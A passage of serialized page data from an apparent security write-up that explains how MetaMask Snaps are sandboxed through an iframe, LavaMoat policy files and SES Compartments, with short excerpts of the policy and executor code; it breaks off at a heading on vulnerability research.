6581,"children":36582},{},[36583],{"type":33,"value":36584},"This enables the iframe to be created with sandbox attributes, ensuring secure execution.",{"type":28,"tag":75,"props":36586,"children":36588},{"id":36587},"lavamoat-against-supply-chain-attacks-layer-2",[36589],{"type":33,"value":36590},"LavaMoat against Supply Chain Attacks - Layer 2",{"type":28,"tag":29,"props":36592,"children":36593},{},[36594],{"type":33,"value":36595},"Instances of software supply chain breaches occur when a malicious component infiltrates a developer's application. Subsequently, attackers exploit the component to extract critical information, such as private access keys. To safeguard against these issues, Metamask employs a tool called LavaMoat.",{"type":28,"tag":29,"props":36597,"children":36598},{},[36599,36601,36607],{"type":33,"value":36600},"Malicious dependencies might utilize built-in modules like ",{"type":28,"tag":98,"props":36602,"children":36604},{"className":36603},[],[36605],{"type":33,"value":36606},"fs",{"type":33,"value":36608},". Alternatively, they may inject malicious code into the npm package to target global objects, like the window and document. They might also include code that leverages XMLHttpRequest to make unauthorized requests to external servers, enabling the exfiltration of sensitive user information.",{"type":28,"tag":29,"props":36610,"children":36611},{},[36612],{"type":33,"value":36613},"In order to prevent this, Metamask Snaps use a Policy file provided by LavaMoat, that grants the platform API and the Globals access just to the essentials components. This limits the access to fields of powerful objects to corrupted dependencies.",{"type":28,"tag":29,"props":36615,"children":36616},{},[36617,36619,36626],{"type":33,"value":36618},"This is how a Policy file related to the iframes ",{"type":28,"tag":87,"props":36620,"children":36623},{"href":36621,"rel":36622},"https://github.com/MetaMask/snaps/blob/c5ddd897734f900f459c66a91f3334e76903825c/packages/snaps-execution-environments/lavamoat/browserify/iframe/policy.json#L49",[91],[36624],{"type":33,"value":36625},"looks",{"type":33,"value":4160},{"type":28,"tag":234,"props":36628,"children":36630},{"className":33630,"code":36629,"language":33632,"meta":7,"style":7},"\"@metamask/post-message-stream\": {\n      \"globals\": {\n        \"MessageEvent.prototype\": true,\n        \"WorkerGlobalScope\": true,\n        \"addEventListener\": true,\n        \"browser\": true,\n        \"chrome\": true,\n        \"location.origin\": true,\n        \"postMessage\": true,\n        \"removeEventListener\": true\n      },\n      \"packages\": {\n        \"@metamask/post-message-stream>@metamask/utils\": true,\n        \"@metamask/post-message-stream>readable-stream\": true\n      }\n    }\n",[36631],{"type":28,"tag":98,"props":36632,"children":36633},{"__ignoreMap":7},[36634,36647,36659,36679,36699,36719,36739,36759,36779,36799,36816,36824,36836,36856,36872,36879],{"type":28,"tag":116,"props":36635,"children":36636},{"class":245,"line":246},[36637,36642],{"type":28,"tag":116,"props":36638,"children":36639},{"style":563},[36640],{"type":33,"value":36641},"\"@metamask/post-message-stream\"",{"type":28,"tag":116,"props":36643,"children":36644},{"style":266},[36645],{"type":33,"value":36646},": {\n",{"type":28,"tag":116,"props":36648,"children":36649},{"class":245,"line":256},[36650,36655],{"type":28,"tag":116,"props":36651,"children":36652},{"style":272},[36653],{"type":33,"value":36654},"      \"globals\"",{"type":28,"tag":116,"props":36656,"children":36657},{"style":266},[36658],{"type":33,"value":36646},{"type":28,"tag":116,"props":36660,"children":36661},{"class":245,"line":293},[36662,36667,36671,36675],{"type":28,"tag":116,"props":36663,"children":36664},{"style":272},[36665],{"type":33,"value":36666},"        \"MessageEvent.prototype\"",{"type":28,"tag":116,"props":36668,"children":36669},{"style":266},[36670],{"type":33,"value":14994},{"type":28,"tag":116,"props":36672,"children":36673},{"style":376},[36674],{"type":33,"value":3664},{"type":28,"tag":116,"props":36676,"children":36677},{"style":266},[36678],{"type":33,"value":3178},{"type":28,"tag":116,"props":36680,"children":36681},{"class":245,"line":361},[36682,36687,36691,36695],{"type":28,"tag":116,"props":36683,"children":36684},{"style":272},[36685],{"type":33,"value":36686},"        \"WorkerGlobalScope\"",{"type":28,"tag":116,"props":36688,"children":36689},{"style":266},[36690],{"type":33,"value":14994},{"type":28,"tag":116,"props":36692,"children":36693},{"style":376},[36694],{"type":33,"value":3664},{"type":28,"tag":116,"props":36696,"children":36697},{"style":266},[36698],{"type":33,"value":3178},{"type":28,"tag":116,"props":36700,"children":36701},{"class":245,"line":387},[36702,36707,36711,36715],{"type":28,"tag":116,"props":36703,"children":36704},{"style":272},[36705],{"type":33,"value":36706},"        \"addEventListener\"",{"type":28,"tag":116,"props":36708,"children":36709},{"style":266},[36710],{"type":33,"value":14994},{"type":28,"tag":116,"props":36712,"children":36713},{"style":376},[36714],{"type":33,"value":3664},{"type":28,"tag":116,"props":36716,"children":36717},{"style":266},[36718],{"type":33,"value":3178},{"type":28,"tag":116,"props":36720,"children":36721},{"class":245,"line":400},[36722,36727,36731,36735],{"type":28,"tag":116,"props":36723,"children":36724},{"style":272},[36725],{"type":33,"value":36726},"        \"browser\"",{"type":28,"tag":116,"props":36728,"children":36729},{"style":266},[36730],{"type":33,"value":14994},{"type":28,"tag":116,"props":36732,"children":36733},{"style":376},[36734],{"type":33,"value":3664},{"type":28,"tag":116,"props":36736,"children":36737},{"style":266},[36738],{"type":33,"value":3178},{"type":28,"tag":116,"props":36740,"children":36741},{"class":245,"line":614},[36742,36747,36751,36755],{"type":28,"tag":116,"props":36743,"children":36744},{"style":272},[36745],{"type":33,"value":36746},"        \"chrome\"",{"type":28,"tag":116,"props":36748,"children":36749},{"style":266},[36750],{"type":33,"value":14994},{"type":28,"tag":116,"props":36752,"children":36753},{"style":376},[36754],{"type":33,"value":3664},{"type":28,"tag":116,"props":36756,"children":36757},{"style":266},[36758],{"type":33,"value":3178},{"type":28,"tag":116,"props":36760,"children":36761},{"class":245,"line":631},[36762,36767,36771,36775],{"type":28,"tag":116,"props":36763,"children":36764},{"style":272},[36765],{"type":33,"value":36766},"        \"location.origin\"",{"type":28,"tag":116,"props":36768,"children":36769},{"style":266},[36770],{"type":33,"value":14994},{"type":28,"tag":116,"props":36772,"children":36773},{"style":376},[36774],{"type":33,"value":3664},{"type":28,"tag":116,"props":36776,"children":36777},{"style":266},[36778],{"type":33,"value":3178},{"type":28,"tag":116,"props":36780,"children":36781},{"class":245,"line":665},[36782,36787,36791,36795],{"type":28,"tag":116,"props":36783,"children":36784},{"style":272},[36785],{"type":33,"value":36786},"        \"postMessage\"",{"type":28,"tag":116,"props":36788,"children":36789},{"style":266},[36790],{"type":33,"value":14994},{"type":28,"tag":116,"props":36792,"children":36793},{"style":376},[36794],{"type":33,"value":3664},{"type":28,"tag":116,"props":36796,"children":36797},{"style":266},[36798],{"type":33,"value":3178},{"type":28,"tag":116,"props":36800,"children":36801},{"class":245,"line":713},[36802,36807,36811],{"type":28,"tag":116,"props":36803,"children":36804},{"style":272},[36805],{"type":33,"value":36806},"        \"removeEventListener\"",{"type":28,"tag":116,"props":36808,"children":36809},{"style":266},[36810],{"type":33,"value":14994},{"type":28,"tag":116,"props":36812,"children":36813},{"style":376},[36814],{"type":33,"value":36815},"true\n",{"type":28,"tag":116,"props":36817,"children":36818},{"class":245,"line":750},[36819],{"type":28,"tag":116,"props":36820,"children":36821},{"style":266},[36822],{"type":33,"value":36823},"      },\n",{"type":28,"tag":116,"props":36825,"children":36826},{"class":245,"line":779},[36827,36832],{"type":28,"tag":116,"props":36828,"children":36829},{"style":272},[36830],{"type":33,"value":36831},"      \"packages\"",{"type":28,"tag":116,"props":36833,"children":36834},{"style":266},[36835],{"type":33,"value":36646},{"type":28,"tag":116,"props":36837,"children":36838},{"class":245,"line":796},[36839,36844,36848,36852],{"type":28,"tag":116,"props":36840,"children":36841},{"style":272},[36842],{"type":33,"value":36843},"        \"@metamask/post-message-stream>@metamask/utils\"",{"type":28,"tag":116,"props":36845,"children":36846},{"style":266},[36847],{"type":33,"value":14994},{"type":28,"tag":116,"props":36849,"children":36850},{"style":376},[36851],{"type":33,"value":3664},{"type":28,"tag":116,"props":36853,"children":36854},{"style":266},[36855],{"type":33,"value":3178},{"type":28,"tag":116,"props":36857,"children":36858},{"class":245,"line":847},[36859,36864,36868],{"type":28,"tag":116,"props":36860,"children":36861},{"style":272},[36862],{"type":33,"value":36863},"        \"@metamask/post-message-stream>readable-stream\"",{"type":28,"tag":116,"props":36865,"children":36866},{"style":266},[36867],{"type":33,"value":14994},{"type":28,"tag":116,"props":36869,"children":36870},{"style":376},[36871],{"type":33,"value":36815},{"type":28,"tag":116,"props":36873,"children":36874},{"class":245,"line":898},[36875],{"type":28,"tag":116,"props":36876,"children":36877},{"style":266},[36878],{"type":33,"value":2444},{"type":28,"tag":116,"props":36880,"children":36881},{"class":245,"line":907},[36882],{"type":28,"tag":116,"props":36883,"children":36884},{"style":266},[36885],{"type":33,"value":3025},{"type":28,"tag":29,"props":36887,"children":36888},{},[36889,36891,36897,36899,36905,36907,36913,36915,36921,36922,36928],{"type":33,"value":36890},"One crucial aspect of the policy, apart from the ",{"type":28,"tag":98,"props":36892,"children":36894},{"className":36893},[],[36895],{"type":33,"value":36896},"globals",{"type":33,"value":36898}," section, is the ",{"type":28,"tag":98,"props":36900,"children":36902},{"className":36901},[],[36903],{"type":33,"value":36904},"packages",{"type":33,"value":36906}," segment. This section permits the ",{"type":28,"tag":98,"props":36908,"children":36910},{"className":36909},[],[36911],{"type":33,"value":36912},"@metamask/post-message-stream",{"type":33,"value":36914},"package to exclusively interact with the package ",{"type":28,"tag":98,"props":36916,"children":36918},{"className":36917},[],[36919],{"type":33,"value":36920},"@metamask/utils",{"type":33,"value":10659},{"type":28,"tag":98,"props":36923,"children":36925},{"className":36924},[],[36926],{"type":33,"value":36927},"readable-stream",{"type":33,"value":36929},". It ensures that interactions with potentially compromised packages are disallowed.",{"type":28,"tag":29,"props":36931,"children":36932},{},[36933,36935,36941],{"type":33,"value":36934},"LavaMoat additionally provides protection against prototype pollution attacks, since a malicious extension could use it to tamper with a legitimate function with arbitrary code. To safeguard against this, LavaMoat uses SES ",{"type":28,"tag":98,"props":36936,"children":36938},{"className":36937},[],[36939],{"type":33,"value":36940},"lockdown",{"type":33,"value":36942}," function to freeze all javascript builtins prototypes.",{"type":28,"tag":75,"props":36944,"children":36946},{"id":36945},"secure-ecmascript-ses-sandbox-layer-3",[36947],{"type":33,"value":36948},"Secure EcmaScript (SES) sandbox - Layer 3",{"type":28,"tag":29,"props":36950,"children":36951},{},[36952,36954,36961],{"type":33,"value":36953},"Within the iframe and after the lavamoat execution, the metamask sandbox uses the ",{"type":28,"tag":87,"props":36955,"children":36958},{"href":36956,"rel":36957},"https://github.com/endojs/endo/tree/master/packages/ses",[91],[36959],{"type":33,"value":36960},"Secure EcmaScript (SES)",{"type":33,"value":36962}," as a way to setup limits to the snap. Let's dig into how it works:",{"type":28,"tag":443,"props":36964,"children":36966},{"id":36965},"ses-fundamentals",[36967],{"type":33,"value":36968},"SES Fundamentals",{"type":28,"tag":36970,"props":36971,"children":36972},"h5",{"id":36940},[36973],{"type":33,"value":36974},"Lockdown",{"type":28,"tag":29,"props":36976,"children":36977},{},[36978,36980,36986],{"type":33,"value":36979},"As the first step of setting up the SES sandbox, Metamask executes the ",{"type":28,"tag":98,"props":36981,"children":36983},{"className":36982},[],[36984],{"type":33,"value":36985},"lockdown()",{"type":33,"value":36987}," function, which protects javascript objects against some attacks, mainly:",{"type":28,"tag":455,"props":36989,"children":36990},{},[36991,37004],{"type":28,"tag":459,"props":36992,"children":36993},{},[36994,36996,37002],{"type":33,"value":36995},"Prototype Pollution\nLockdown executes ",{"type":28,"tag":98,"props":36997,"children":36999},{"className":36998},[],[37000],{"type":33,"value":37001},"Object.freeze",{"type":33,"value":37003}," against all javascript builtins prototypes, preventing these attacks.",{"type":28,"tag":459,"props":37005,"children":37006},{},[37007,37009,37015,37017,37023],{"type":33,"value":37008},"Information disclosure\nLockdown removes some sensitive information that can be disclosed by some javascript builtin objects, such as the ",{"type":28,"tag":98,"props":37010,"children":37012},{"className":37011},[],[37013],{"type":33,"value":37014},"trace",{"type":33,"value":37016}," attribute in an ",{"type":28,"tag":98,"props":37018,"children":37020},{"className":37019},[],[37021],{"type":33,"value":37022},"Error",{"type":33,"value":37024}," object, which contains the stack trace of the error.",{"type":28,"tag":36970,"props":37026,"children":37028},{"id":37027},"compartment",[37029],{"type":33,"value":37030},"Compartment",{"type":28,"tag":29,"props":37032,"children":37033},{},[37034,37036,37042,37044,37049],{"type":33,"value":37035},"Compartments serve as the fundamental security layer within the snap execution environment. Their primary function is to establish a tightly controlled sandboxed execution environment. This is accomplished by manipulating the ",{"type":28,"tag":98,"props":37037,"children":37039},{"className":37038},[],[37040],{"type":33,"value":37041},"globalThis",{"type":33,"value":37043}," object to exclusively accommodate secure functions. Consequently, any code executed within this controlled ",{"type":28,"tag":98,"props":37045,"children":37047},{"className":37046},[],[37048],{"type":33,"value":37041},{"type":33,"value":37050}," context is incapable of tampering with security.",{"type":28,"tag":234,"props":37052,"children":37054},{"className":35239,"code":37053,"language":35241,"meta":7,"style":7},"const c = new Compartment();\nc.globalThis === globalThis; // false\nc.globalThis.JSON === JSON; // true\n",[37055],{"type":28,"tag":98,"props":37056,"children":37057},{"__ignoreMap":7},[37058,37086,37119],{"type":28,"tag":116,"props":37059,"children":37060},{"class":245,"line":246},[37061,37065,37069,37073,37077,37082],{"type":28,"tag":116,"props":37062,"children":37063},{"style":376},[37064],{"type":33,"value":9323},{"type":28,"tag":116,"props":37066,"children":37067},{"style":272},[37068],{"type":33,"value":1740},{"type":28,"tag":116,"props":37070,"children":37071},{"style":370},[37072],{"type":33,"value":2226},{"type":28,"tag":116,"props":37074,"children":37075},{"style":376},[37076],{"type":33,"value":31582},{"type":28,"tag":116,"props":37078,"children":37079},{"style":282},[37080],{"type":33,"value":37081}," Compartment",{"type":28,"tag":116,"props":37083,"children":37084},{"style":266},[37085],{"type":33,"value":1445},{"type":28,"tag":116,"props":37087,"children":37088},{"class":245,"line":256},[37089,37093,37097,37101,37105,37110,37114],{"type":28,"tag":116,"props":37090,"children":37091},{"style":272},[37092],{"type":33,"value":1797},{"type":28,"tag":116,"props":37094,"children":37095},{"style":266},[37096],{"type":33,"value":141},{"type":28,"tag":116,"props":37098,"children":37099},{"style":272},[37100],{"type":33,"value":37041},{"type":28,"tag":116,"props":37102,"children":37103},{"style":370},[37104],{"type":33,"value":31073},{"type":28,"tag":116,"props":37106,"children":37107},{"style":272},[37108],{"type":33,"value":37109}," globalThis",{"type":28,"tag":116,"props":37111,"children":37112},{"style":266},[37113],{"type":33,"value":16888},{"type":28,"tag":116,"props":37115,"children":37116},{"style":250},[37117],{"type":33,"value":37118},"// false\n",{"type":28,"tag":116,"props":37120,"children":37121},{"class":245,"line":293},[37122,37126,37130,37134,37138,37143,37147,37152,37156],{"type":28,"tag":116,"props":37123,"children":37124},{"style":272},[37125],{"type":33,"value":1797},{"type":28,"tag":116,"props":37127,"children":37128},{"style":266},[37129],{"type":33,"value":141},{"type":28,"tag":116,"props":37131,"children":37132},{"style":272},[37133],{"type":33,"value":37041},{"type":28,"tag":116,"props":37135,"children":37136},{"style":266},[37137],{"type":33,"value":141},{"type":28,"tag":116,"props":37139,"children":37140},{"style":272},[37141],{"type":33,"value":37142},"JSON",{"type":28,"tag":116,"props":37144,"children":37145},{"style":370},[37146],{"type":33,"value":31073},{"type":28,"tag":116,"props":37148,"children":37149},{"style":272},[37150],{"type":33,"value":37151}," JSON",{"type":28,"tag":116,"props":37153,"children":37154},{"style":266},[37155],{"type":33,"value":16888},{"type":28,"tag":116,"props":37157,"children":37158},{"style":250},[37159],{"type":33,"value":37160},"// true\n",{"type":28,"tag":29,"props":37162,"children":37163},{},[37164,37166,37172,37174,37180,37182,37187],{"type":33,"value":37165},"Compartment also changes the behaviour of evaluators functions such as ",{"type":28,"tag":98,"props":37167,"children":37169},{"className":37168},[],[37170],{"type":33,"value":37171},"eval",{"type":33,"value":37173}," and the ",{"type":28,"tag":98,"props":37175,"children":37177},{"className":37176},[],[37178],{"type":33,"value":37179},"Function",{"type":33,"value":37181}," constructor, so that the evaluated code is also executed within the sandboxed ",{"type":28,"tag":98,"props":37183,"children":37185},{"className":37184},[],[37186],{"type":33,"value":37041},{"type":33,"value":141},{"type":28,"tag":36970,"props":37189,"children":37191},{"id":37190},"endowments",[37192],{"type":33,"value":37193},"Endowments",{"type":28,"tag":29,"props":37195,"children":37196},{},[37197,37199,37203,37205,37210],{"type":33,"value":37198},"While creating a Compartment, it is possible to specify ",{"type":28,"tag":2583,"props":37200,"children":37201},{},[37202],{"type":33,"value":37190},{"type":33,"value":37204},". These endowments constitute objects that become accessible within the Compartment's ",{"type":28,"tag":98,"props":37206,"children":37208},{"className":37207},[],[37209],{"type":33,"value":37041},{"type":33,"value":37211},". However, endowments need to be carefully chosen and sanitized since they will be exposed to the untrusted environment.",{"type":28,"tag":29,"props":37213,"children":37214},{},[37215,37217,37223],{"type":33,"value":37216},"In addition, SES provides the ",{"type":28,"tag":98,"props":37218,"children":37220},{"className":37219},[],[37221],{"type":33,"value":37222},"harden()",{"type":33,"value":37224}," function, which is mainly used to prevent the endowments to be modified by a malicious code executed in a Compartment.",{"type":28,"tag":443,"props":37226,"children":37228},{"id":37227},"setting-up-snaps-execution-env",[37229],{"type":33,"value":37230},"Setting up Snaps Execution Env",{"type":28,"tag":29,"props":37232,"children":37233},{},[37234],{"type":33,"value":37235},"When starting a snap, the setup follows these steps:",{"type":28,"tag":455,"props":37237,"children":37238},{},[37239],{"type":28,"tag":459,"props":37240,"children":37241},{},[37242],{"type":28,"tag":4995,"props":37243,"children":37244},{},[37245,37247],{"type":33,"value":37246},"Create endowments based on snap ",{"type":28,"tag":87,"props":37248,"children":37251},{"href":37249,"rel":37250},"https://github.com/MetaMask/snaps/blob/92fcf31678c13067615e6e69681e57a542a2c58a/packages/snaps-execution-environments/src/common/BaseSnapExecutor.ts#L327",[91],[37252],{"type":33,"value":37253},"permissions",{"type":28,"tag":234,"props":37255,"children":37257},{"className":35239,"code":37256,"language":35241,"meta":7,"style":7},"const { endowments, teardown: endowmentTeardown } = createEndowments(\n    snap,\n    ethereum,\n    snapId,\n    _endowments,\n);\n",[37258],{"type":28,"tag":98,"props":37259,"children":37260},{"__ignoreMap":7},[37261,37311,37323,37334,37346,37358],{"type":28,"tag":116,"props":37262,"children":37263},{"class":245,"line":246},[37264,37268,37272,37276,37280,37285,37289,37294,37298,37302,37307],{"type":28,"tag":116,"props":37265,"children":37266},{"style":376},[37267],{"type":33,"value":9323},{"type":28,"tag":116,"props":37269,"children":37270},{"style":266},[37271],{"type":33,"value":9254},{"type":28,"tag":116,"props":37273,"children":37274},{"style":272},[37275],{"type":33,"value":37190},{"type":28,"tag":116,"props":37277,"children":37278},{"style":266},[37279],{"type":33,"value":825},{"type":28,"tag":116,"props":37281,"children":37282},{"style":272},[37283],{"type":33,"value":37284},"teardown",{"type":28,"tag":116,"props":37286,"children":37287},{"style":266},[37288],{"type":33,"value":14994},{"type":28,"tag":116,"props":37290,"children":37291},{"style":272},[37292],{"type":33,"value":37293},"endowmentTeardown",{"type":28,"tag":116,"props":37295,"children":37296},{"style":266},[37297],{"type":33,"value":35828},{"type":28,"tag":116,"props":37299,"children":37300},{"style":370},[37301],{"type":33,"value":373},{"type":28,"tag":116,"props":37303,"children":37304},{"style":282},[37305],{"type":33,"value":37306}," createEndowments",{"type":28,"tag":116,"props":37308,"children":37309},{"style":266},[37310],{"type":33,"value":3133},{"type":28,"tag":116,"props":37312,"children":37313},{"class":245,"line":256},[37314,37319],{"type":28,"tag":116,"props":37315,"children":37316},{"style":272},[37317],{"type":33,"value":37318},"    snap",{"type":28,"tag":116,"props":37320,"children":37321},{"style":266},[37322],{"type":33,"value":3178},{"type":28,"tag":116,"props":37324,"children":37325},{"class":245,"line":293},[37326,37330],{"type":28,"tag":116,"props":37327,"children":37328},{"style":272},[37329],{"type":33,"value":31135},{"type":28,"tag":116,"props":37331,"children":37332},{"style":266},[37333],{"type":33,"value":3178},{"type":28,"tag":116,"props":37335,"children":37336},{"class":245,"line":361},[37337,37342],{"type":28,"tag":116,"props":37338,"children":37339},{"style":272},[37340],{"type":33,"value":37341},"    snapId",{"type":28,"tag":116,"props":37343,"children":37344},{"style":266},[37345],{"type":33,"value":3178},{"type":28,"tag":116,"props":37347,"children":37348},{"class":245,"line":387},[37349,37354],{"type":28,"tag":116,"props":37350,"children":37351},{"style":272},[37352],{"type":33,"value":37353},"    _endowments",{"type":28,"tag":116,"props":37355,"children":37356},{"style":266},[37357],{"type":33,"value":3178},{"type":28,"tag":116,"props":37359,"children":37360},{"class":245,"line":400},[37361],{"type":28,"tag":116,"props":37362,"children":37363},{"style":266},[37364],{"type":33,"value":895},{"type":28,"tag":29,"props":37366,"children":37367},{},[37368],{"type":33,"value":37369},"In the snap development, the required permissions need to be specified in a snap manifest file. Some of these permissions expose extra functions as endowments in the Compartment.",{"type":28,"tag":29,"props":37371,"children":37372},{},[37373,37375,37381,37383,37389],{"type":33,"value":37374},"One clear example is the ",{"type":28,"tag":98,"props":37376,"children":37378},{"className":37377},[],[37379],{"type":33,"value":37380},"endowment:network-access",{"type":33,"value":37382}," permission, that adds the ",{"type":28,"tag":98,"props":37384,"children":37386},{"className":37385},[],[37387],{"type":33,"value":37388},"fetch()",{"type":33,"value":37390}," function to the endowments.",{"type":28,"tag":29,"props":37392,"children":37393},{},[37394,37396,37402],{"type":33,"value":37395},"All endowments are protected with the ",{"type":28,"tag":98,"props":37397,"children":37399},{"className":37398},[],[37400],{"type":33,"value":37401},"harden",{"type":33,"value":37403}," function to prevent possible exploits derived from the endowment modification, with two exceptions.",{"type":28,"tag":455,"props":37405,"children":37406},{"start":256},[37407],{"type":28,"tag":459,"props":37408,"children":37409},{},[37410],{"type":28,"tag":4995,"props":37411,"children":37412},{},[37413,37415],{"type":33,"value":37414},"Create the snap ",{"type":28,"tag":87,"props":37416,"children":37419},{"href":37417,"rel":37418},"https://github.com/MetaMask/snaps/blob/92fcf31678c13067615e6e69681e57a542a2c58a/packages/snaps-execution-environments/src/common/BaseSnapExecutor.ts#L345",[91],[37420],{"type":33,"value":37027},{"type":28,"tag":234,"props":37422,"children":37424},{"className":35239,"code":37423,"language":35241,"meta":7,"style":7},"const compartment = new Compartment({\n    ...endowments,\n    module: snapModule,\n    exports: snapModule.exports,\n});\n",[37425],{"type":28,"tag":98,"props":37426,"children":37427},{"__ignoreMap":7},[37428,37456,37472,37489,37514],{"type":28,"tag":116,"props":37429,"children":37430},{"class":245,"line":246},[37431,37435,37440,37444,37448,37452],{"type":28,"tag":116,"props":37432,"children":37433},{"style":376},[37434],{"type":33,"value":9323},{"type":28,"tag":116,"props":37436,"children":37437},{"style":272},[37438],{"type":33,"value":37439}," compartment",{"type":28,"tag":116,"props":37441,"children":37442},{"style":370},[37443],{"type":33,"value":2226},{"type":28,"tag":116,"props":37445,"children":37446},{"style":376},[37447],{"type":33,"value":31582},{"type":28,"tag":116,"props":37449,"children":37450},{"style":282},[37451],{"type":33,"value":37081},{"type":28,"tag":116,"props":37453,"children":37454},{"style":266},[37455],{"type":33,"value":14803},{"type":28,"tag":116,"props":37457,"children":37458},{"class":245,"line":256},[37459,37464,37468],{"type":28,"tag":116,"props":37460,"children":37461},{"style":370},[37462],{"type":33,"value":37463},"    ...",{"type":28,"tag":116,"props":37465,"children":37466},{"style":272},[37467],{"type":33,"value":37190},{"type":28,"tag":116,"props":37469,"children":37470},{"style":266},[37471],{"type":33,"value":3178},{"type":28,"tag":116,"props":37473,"children":37474},{"class":245,"line":293},[37475,37480,37485],{"type":28,"tag":116,"props":37476,"children":37477},{"style":272},[37478],{"type":33,"value":37479},"    module:",{"type":28,"tag":116,"props":37481,"children":37482},{"style":272},[37483],{"type":33,"value":37484}," snapModule",{"type":28,"tag":116,"props":37486,"children":37487},{"style":266},[37488],{"type":33,"value":3178},{"type":28,"tag":116,"props":37490,"children":37491},{"class":245,"line":361},[37492,37497,37501,37505,37510],{"type":28,"tag":116,"props":37493,"children":37494},{"style":272},[37495],{"type":33,"value":37496},"    exports:",{"type":28,"tag":116,"props":37498,"children":37499},{"style":272},[37500],{"type":33,"value":37484},{"type":28,"tag":116,"props":37502,"children":37503},{"style":266},[37504],{"type":33,"value":141},{"type":28,"tag":116,"props":37506,"children":37507},{"style":272},[37508],{"type":33,"value":37509},"exports",{"type":28,"tag":116,"props":37511,"children":37512},{"style":266},[37513],{"type":33,"value":3178},{"type":28,"tag":116,"props":37515,"children":37516},{"class":245,"line":387},[37517],{"type":28,"tag":116,"props":37518,"children":37519},{"style":266},[37520],{"type":33,"value":34964},{"type":28,"tag":29,"props":37522,"children":37523},{},[37524,37526,37532,37533,37538,37540,37545],{"type":33,"value":37525},"Note: ",{"type":28,"tag":98,"props":37527,"children":37529},{"className":37528},[],[37530],{"type":33,"value":37531},"module",{"type":33,"value":10659},{"type":28,"tag":98,"props":37534,"children":37536},{"className":37535},[],[37537],{"type":33,"value":37509},{"type":33,"value":37539}," are passed as endowments, but without being ",{"type":28,"tag":2583,"props":37541,"children":37542},{},[37543],{"type":33,"value":37544},"hardened",{"type":33,"value":37546},". This is intentional, as the snap needs to export functions to be correctly executed.",{"type":28,"tag":455,"props":37548,"children":37549},{"start":293},[37550],{"type":28,"tag":459,"props":37551,"children":37552},{},[37553],{"type":28,"tag":4995,"props":37554,"children":37555},{},[37556,37558],{"type":33,"value":37557},"Evaluate the snap code inside the ",{"type":28,"tag":87,"props":37559,"children":37562},{"href":37560,"rel":37561},"https://github.com/MetaMask/snaps/blob/92fcf31678c13067615e6e69681e57a542a2c58a/packages/snaps-execution-environments/src/common/BaseSnapExecutor.ts#L359",[91],[37563],{"type":33,"value":37027},{"type":28,"tag":234,"props":37565,"children":37567},{"className":35239,"code":37566,"language":35241,"meta":7,"style":7},"await this.executeInSnapContext(snapId, () => {\n    compartment.evaluate(sourceCode);\n    this.registerSnapExports(snapId, snapModule);\n});\n",[37568],{"type":28,"tag":98,"props":37569,"children":37570},{"__ignoreMap":7},[37571,37612,37642,37679],{"type":28,"tag":116,"props":37572,"children":37573},{"class":245,"line":246},[37574,37578,37582,37586,37591,37595,37599,37604,37608],{"type":28,"tag":116,"props":37575,"children":37576},{"style":260},[37577],{"type":33,"value":1091},{"type":28,"tag":116,"props":37579,"children":37580},{"style":376},[37581],{"type":33,"value":35342},{"type":28,"tag":116,"props":37583,"children":37584},{"style":266},[37585],{"type":33,"value":141},{"type":28,"tag":116,"props":37587,"children":37588},{"style":282},[37589],{"type":33,"value":37590},"executeInSnapContext",{"type":28,"tag":116,"props":37592,"children":37593},{"style":266},[37594],{"type":33,"value":313},{"type":28,"tag":116,"props":37596,"children":37597},{"style":272},[37598],{"type":33,"value":35646},{"type":28,"tag":116,"props":37600,"children":37601},{"style":266},[37602],{"type":33,"value":37603},", () ",{"type":28,"tag":116,"props":37605,"children":37606},{"style":376},[37607],{"type":33,"value":1286},{"type":28,"tag":116,"props":37609,"children":37610},{"style":266},[37611],{"type":33,"value":1291},{"type":28,"tag":116,"props":37613,"children":37614},{"class":245,"line":256},[37615,37620,37624,37629,37633,37638],{"type":28,"tag":116,"props":37616,"children":37617},{"style":272},[37618],{"type":33,"value":37619},"    compartment",{"type":28,"tag":116,"props":37621,"children":37622},{"style":266},[37623],{"type":33,"value":141},{"type":28,"tag":116,"props":37625,"children":37626},{"style":282},[37627],{"type":33,"value":37628},"evaluate",{"type":28,"tag":116,"props":37630,"children":37631},{"style":266},[37632],{"type":33,"value":313},{"type":28,"tag":116,"props":37634,"children":37635},{"style":272},[37636],{"type":33,"value":37637},"sourceCode",{"type":28,"tag":116,"props":37639,"children":37640},{"style":266},[37641],{"type":33,"value":895},{"type":28,"tag":116,"props":37643,"children":37644},{"class":245,"line":293},[37645,37649,37653,37658,37662,37666,37670,37675],{"type":28,"tag":116,"props":37646,"children":37647},{"style":376},[37648],{"type":33,"value":35690},{"type":28,"tag":116,"props":37650,"children":37651},{"style":266},[37652],{"type":33,"value":141},{"type":28,"tag":116,"props":37654,"children":37655},{"style":282},[37656],{"type":33,"value":37657},"registerSnapExports",{"type":28,"tag":116,"props":37659,"children":37660},{"style":266},[37661],{"type":33,"value":313},{"type":28,"tag":116,"props":37663,"children":37664},{"style":272},[37665],{"type":33,"value":35646},{"type":28,"tag":116,"props":37667,"children":37668},{"style":266},[37669],{"type":33,"value":825},{"type":28,"tag":116,"props":37671,"children":37672},{"style":272},[37673],{"type":33,"value":37674},"snapModule",{"type":28,"tag":116,"props":37676,"children":37677},{"style":266},[37678],{"type":33,"value":895},{"type":28,"tag":116,"props":37680,"children":37681},{"class":245,"line":361},[37682],{"type":28,"tag":116,"props":37683,"children":37684},{"style":266},[37685],{"type":33,"value":34964},{"type":28,"tag":29,"props":37687,"children":37688},{},[37689,37691,37697,37698,37704,37705,37711],{"type":33,"value":37690},"According to the documentation, the snap must contain one of the following function exports: ",{"type":28,"tag":98,"props":37692,"children":37694},{"className":37693},[],[37695],{"type":33,"value":37696},"onRpcRequest",{"type":33,"value":825},{"type":28,"tag":98,"props":37699,"children":37701},{"className":37700},[],[37702],{"type":33,"value":37703},"onTransaction",{"type":33,"value":12800},{"type":28,"tag":98,"props":37706,"children":37708},{"className":37707},[],[37709],{"type":33,"value":37710},"onCronjob",{"type":33,"value":141},{"type":28,"tag":29,"props":37713,"children":37714},{},[37715,37717,37722],{"type":33,"value":37716},"Once the Compartment creates these functions, no matter where they are executed, they will always be evaluated within the sandboxed ",{"type":28,"tag":98,"props":37718,"children":37720},{"className":37719},[],[37721],{"type":33,"value":37041},{"type":33,"value":37723}," environment of that Compartment.",{"type":28,"tag":29,"props":37725,"children":37726},{},[37727],{"type":33,"value":37728},"After the evaluation, the function exports are registered and executed later when the respective event is emmited.",{"type":28,"tag":63,"props":37730,"children":37732},{"id":37731},"vulnerability-research",[37733],{"type":33,"value":37734},"Vulnerability 